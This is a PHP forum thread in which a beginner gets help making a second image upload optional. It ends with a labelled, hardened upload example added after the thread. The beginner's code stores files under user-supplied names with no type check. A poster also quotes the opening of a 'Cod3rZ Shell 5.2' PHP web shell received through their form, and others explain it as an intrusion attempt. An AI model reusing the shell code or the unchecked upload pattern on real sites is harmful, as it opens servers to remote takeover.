
Hi

 

I have a problem with my uploader, the trouble is I want the user to have the option to either upload 1 or 2 files, the trouble is if the user only uploads one image it brings this echo into play

 

echo "Sorry, there was a problem uploading your file.";

 

It works fine if they use both uploaders.

 

There are a couple of questions: would you take the uploader out and create a link to a separate php form to upload, or is there a simple fix for this?

I will not include all the code just the uploader code

 

$target = "image/";

$target = $target . basename( $_FILES['upload']['name']);

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

 

 

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

{

echo "The file ". basename( $_FILES['upload']['name']);

echo "and " . basename( $_FILES['upload1']['name'])." have been uploaded, and your information has been added to the directory";

 

Could you also let me know if the echos are ok in the above code?

 

Thanks in advance

 

 

Hi

 

I have tried the code in a few places, but as a noob guesstimate I thought these looked the most likely

 

<?php

$target = "image/";

$target = $target . basename( $_FILES['upload']['name']);

if(isset($_FILES['upload1'])) {

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

}

$name=$_POST['name'];

$address=$_POST['address'];

$address1=$_POST['address1'];

 

I also tried it here

 

$mobile=$_POST['mobile'];

$email=$_POST['email'];

$upload=($_FILES['upload']['name']);

if(isset($_FILES['upload1'])) {

$upload1=($_FILES['upload1']['name']);

}

$bio=$_POST['bio'];

 

 

You need it everywhere you access that $variable. Just from your first post I can see at least one other place you need it

 

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

Just to make sure,

 

When I am placing this in with the variable I take it I use the {}

 

ie

if(isset($_FILES['upload1'])) {

$target2 = "image/";

$target2= $target2 . basename( $_FILES['upload1']['name']);

}

 

if(isset($_FILES['upload1'])) {

$upload1=($_FILES['upload1']['name']);

}

 

Is this the way if the line already begins with "if"

 

ie

if(isset($_FILES['upload1']))

if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2))

 

It's this line that is confusing me the most. When I play around with it, it starts throwing up errors

 

Oh I take it I leave this one alone and DO NOT insert the

if(isset($_FILES['upload1'])) into this line

mysql_real_escape_string($upload1),

 

thanks again

Yes, as it's a block you only want to happen if it's true, then you have to surround it in the squiggly brackets to make it a code block.

 

if you do...

 

if(isset($_FILES['upload1'])) {
   if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {
  }
}

 

Then neither file will get moved if upload1 doesn't exist.

 

With regards to inserting it into the database you will need to set up some kind of system so that if the file doesn't exist your query will still work only insert a blank string rather than the filename.

 

Forgive me if I'm totally wrong, but I am assuming that this statement you put up

 

if(isset($_FILES['upload1'])) {

  if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {

  }

}

 

is asking for both files to be put into the folder on the server, so I am guessing it is looking for 2 files to put on the server. What I am trying to get at is the &&: am I right in that this means both are true (meaning the user has attached the two files), if not throw an error?

 

 

By the way if I use this code I am getting an error at line 43

Parse error: syntax error, unexpected T_ELSE in /customers/derbyartists.co.uk/derbyartists.co.uk/httpd.www/php/signup1.php on line 43

 

line 43:-

else {

echo "Sorry, there was a problem uploading your file.";

}

 

?>

 

if(isset($_FILES['upload1'])) {
   if(move_uploaded_file($_FILES['upload']['tmp_name'], $target) && move_uploaded_file($_FILES['upload1']['tmp_name'], $target2)) {
  }
}

 

Was an example of what was wrong, but yes, that inner if statement says if 'upload' successfully moved and 'upload1' successfully moved.

 

else {
echo "Sorry, there was a problem uploading your file.";
} 

 

The error message tells you the problem unexpected ELSE, basically the only valid place for the ELSE statement is...

 

if($something) {
   // do summit
} HERE

 

Before somebody points it out, I don't mean exactly there, it can be on the line below; the point is there can't be anything else between the closing bracket of an if statement and the word else.

 

 

Well I see where you are coming from now people, I think with this I am going to go back to the drawing board and start again....I fully understand why they call php the voodoo language.

 

I have managed to get so far and then the more tutorials I look at the more complex it becomes.

 

Yeah, OK, I have managed to get two files to upload to my server "which personally I am happy with", but a message of advice from a noob, to a noob, if you are trying to upload multiple files.

 

Take on board you need to include script to help:-

 

1-To stop two file names the same being uploaded

2-Security for the database and your server

3-The user may only want to upload 1 image, so you have to tell the php file and sql about the fact.

4-Take into consideration symbols in the users file names.

 

There may be many more considerations but these are the main ones I have picked up on.

 

I now hang my head in shame, as you have all beat me with a stick, here is me thinking it be simple as I cracked two file uploads to mail, so how hard can be getting them to an sql and send the user an email response...Basic........VERY WRONG.

Like Cags and Tim etc have said, go back to the very basics starting with

 

<?php

 

Once you understand the basic building blocks, what you're currently attempting is not considered anything too complicated. But the first thing you need to learn is the building blocks. I only picked up PHP about 4 months ago, but I have had experience in plenty of other programming languages (Java, C, VB6, VB .NET, C#); to a large degree once you know one, picking up another is fairly pain free, you just have to learn the intricacies of the particular syntax. I taught myself with help from http://www.youtube.com/phpacademy, you may pick up a few minor bad habits from the tutorials, but it will certainly help you get a grounding. Once you have been through the PHP Basics playlist, the advice given by people on forums such as this should start to make a whole lot more sense.

The best free application I've personally used is Notepad++, the ability to code highlight and also show matching brackets (ie. if you click on an opening bracket it highlights the corresponding closing bracket) are invaluable.

Last thing cags, I have just received an email because I'm still using form to mail and testing the database on a different server, 3 emails in total, the first read something like this, not going to put all the code up just the start

 

<?php

# Cod3rZ Shell 5.2

# c0ded by Cod3rZ

# http://cod3rz.helloweb.eu

# http://devilsnight.altervista.org

# 07/08/08

# Cuz We Back Rude This Time

 

# Thanks to nexen

 

error_reporting(0);

 

  $version = '5.2';

  $info = $_SERVER['SERVER_SOFTWARE'];

  $page = $_SERVER['SCRIPT_NAME'];

  $site = getenv("HTTP_HOST");

  $uname = php_uname();

  $smod = ini_get('safe_mode');

  $uid = getmyuid();

  $gid = getmygid();

  $dir = realpath($_POST['dir']);

  $mkdir = $_POST['makedir'];

  $mydir = $_POST['deletedir'];

  $cmd = $_GET['cmd'];

  $host = $_POST['host'];

  $proto = $_POST['protocol'];

  $delete = $_POST['delete'];

  $phpeval = $_POST['php_eval'];

  $db = $_POST['db'];

  $query = $_POST['query'];

  $user = $_POST['user'];

  $pass = $_POST['passd'];

  $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018");

  $quotes = get_magic_quotes_gpc();

if ($quotes == "1" or $quotes == "on")

  {

 

Is someone trying to get in?

Depends on the circumstance. Theoretically if they can trick your system into uploading a file with that content on to your server, they could then open that file and cause all sorts of havoc. Judging by the part you posted, that script, if run on your server, would give somebody access to knowing what various settings are on your server (which would make hacking it easier); it also looks like it would allow them to delete various files and folders.

 

The downside of providing any URLs on a site such as this: people can view your skill level, they know where your site is, and in many situations they know what your code is. This makes it countless times easier to hack your site.

It would also depend on your server setup, whether you are filtering for file type, how you rename the file when you move it. If for example when the user is uploading a file you have no checks to see what type it is and when you move it you keep the same file extension then all the user has to do is upload any file they want and they essentially have fairly open access to your site. If you check the filetype or change the file extension this will become slightly more difficult as most servers by default will only parse PHP information which is stored in a .php file (in some cases .html) and are highly unlikely to cause much trouble if the file extension is .jpg/.gif etc.
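
An upload handler that applies the points raised in this thread: an optional second file, no duplicate names, no user-supplied characters in stored names, and a file-type check with a server-chosen extension. This is an added example, not code posted by anyone in the thread; `store_image()` and the allow-list are hypothetical, and it assumes PHP 7.1+ with the fileinfo extension.

```php
<?php
// Added example, not code from the thread. store_image() is a hypothetical
// helper; field names and the image/ directory follow the posts above.
const ALLOWED_TYPES = [ // MIME type detected from content => extension we assign
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

// Returns the stored file name, '' when an optional field was left empty,
// and throws when the upload is rejected.
function store_image(?array $file, string $dir, bool $required): string
{
    // An empty file input still appears in $_FILES with UPLOAD_ERR_NO_FILE,
    // so isset() alone does not tell you whether a file was chosen.
    if ($file === null || $file['error'] === UPLOAD_ERR_NO_FILE) {
        if ($required) {
            throw new RuntimeException('A file is required.');
        }
        return '';
    }
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('Upload failed.');
    }
    // Decide the type from the file content, never from the client-supplied
    // file name or $file['type'].
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    $ext  = ALLOWED_TYPES[(string) $mime] ?? null;
    if ($ext === null) {
        throw new RuntimeException('Only JPEG, PNG or GIF images are accepted.');
    }
    // Server-generated name: no collisions, no user-supplied characters, and
    // the extension comes from the allow-list, so it can never be .php.
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], rtrim($dir, '/') . '/' . $name)) {
        throw new RuntimeException('Could not store the file.');
    }
    return $name;
}

try {
    $upload  = store_image($_FILES['upload'] ?? null, 'image/', true);
    $upload1 = store_image($_FILES['upload1'] ?? null, 'image/', false);
    // $upload1 is '' when only one image was sent; store that in the database.
    echo 'Stored: ' . htmlspecialchars(trim("$upload $upload1"));
} catch (RuntimeException $e) {
    echo 'Sorry, there was a problem uploading your file.';
}
```

A content check alone can be fooled by a file that is both a valid image and contains script text, which is why the stored extension comes from the allow-list rather than from the uploaded name. The upload directory should also be configured so the web server does not execute scripts from it.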
